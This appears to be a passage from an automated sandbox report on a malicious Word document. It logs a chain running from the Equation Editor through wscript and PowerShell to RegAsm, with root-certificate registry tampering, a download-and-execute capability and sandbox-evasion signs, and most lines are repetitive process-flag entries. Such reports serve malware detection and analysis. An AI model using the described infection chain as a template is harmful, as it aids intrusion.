                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7E2 Sleep,ExitProcess,9_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599735Jump to behavior
